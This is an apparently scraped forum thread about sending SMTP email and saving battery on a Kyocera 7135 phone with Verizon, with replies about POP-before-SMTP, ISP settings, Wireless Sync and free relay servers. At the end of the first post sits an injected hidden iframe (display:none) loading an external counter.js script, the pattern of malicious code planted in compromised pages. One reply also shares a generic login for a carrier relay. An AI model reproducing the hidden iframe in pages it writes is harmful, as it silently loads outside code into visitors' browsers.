Outgoing Email on the Kyocera 7135 w/Verizon

Okay, guys, I'm a Palm newbie. I've mastered almost every feature of the Kyocera 7135, with the exception of one thing: I'm unable to send email using SMTP wirelessly. Are there any Palm programs, fixes or work arounds you can recommend to remedy this problem?

Oh, one other issue... Do you have any recommendations about improving the battery's staying power? The phone is a power hog when you access the Express Network. My work around for this is to simply keep it on the charger at home and work, when I'm not mobile.

Thanks for your help!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

With some email services you must first receive (pop) mail and then send. This may be your problem. What email client are your using?

Using the verizon's VZW Quick 2 Net network setting, you cannot send email using Eudora. Verizon's VZM does not have a stmp outgoing mail server. If you have email through a pop server, then you need to set up a new network service, enter your user id, leave the password at prompt, connection is wireless modem, phone number would be the phone number you would use to dial into your isp if you can a regular modem on your computer. Then you can connect to your ISP which would use your ISP's mail server.

I Did It!

Through Verizon's "Wireless Sync Desktop Client" software, I was able to synchronize w/Eudora on my desktop, wirelessly of course, and send my email out through my desktop. As long as I leave my desktop on and "Wireless Sync" connected, it works like a charm.

Thanks for your feedback, guys...

Verizon has an SMTP server but they do not let anyone use it because they feel is that if you use it, it leaves the network vulnerable to spam and attacks.

Eudora

If you have a dialup ISP service, check with them. I use Eudora for incoming and outgoing mail. My ISP (Earthlink) requires I configure the smtp a little differently than I do my dialup connection, but once I was set up it works fine.

airbridge is free, but totally unsupported by VZW. They are trying to eliminate it. Some regions, it appears to require authentication. If it does in your area, you can usually use qnc as both the user name and password and it will work. Sometimes airbridge can take up to six or more hours to deliver mail, and if you call VZW for help, they will say "too bad...".

Another option for a free SMTP server is http://www.myrealbox.com/a?.BQ.EE.Z1QQ.d
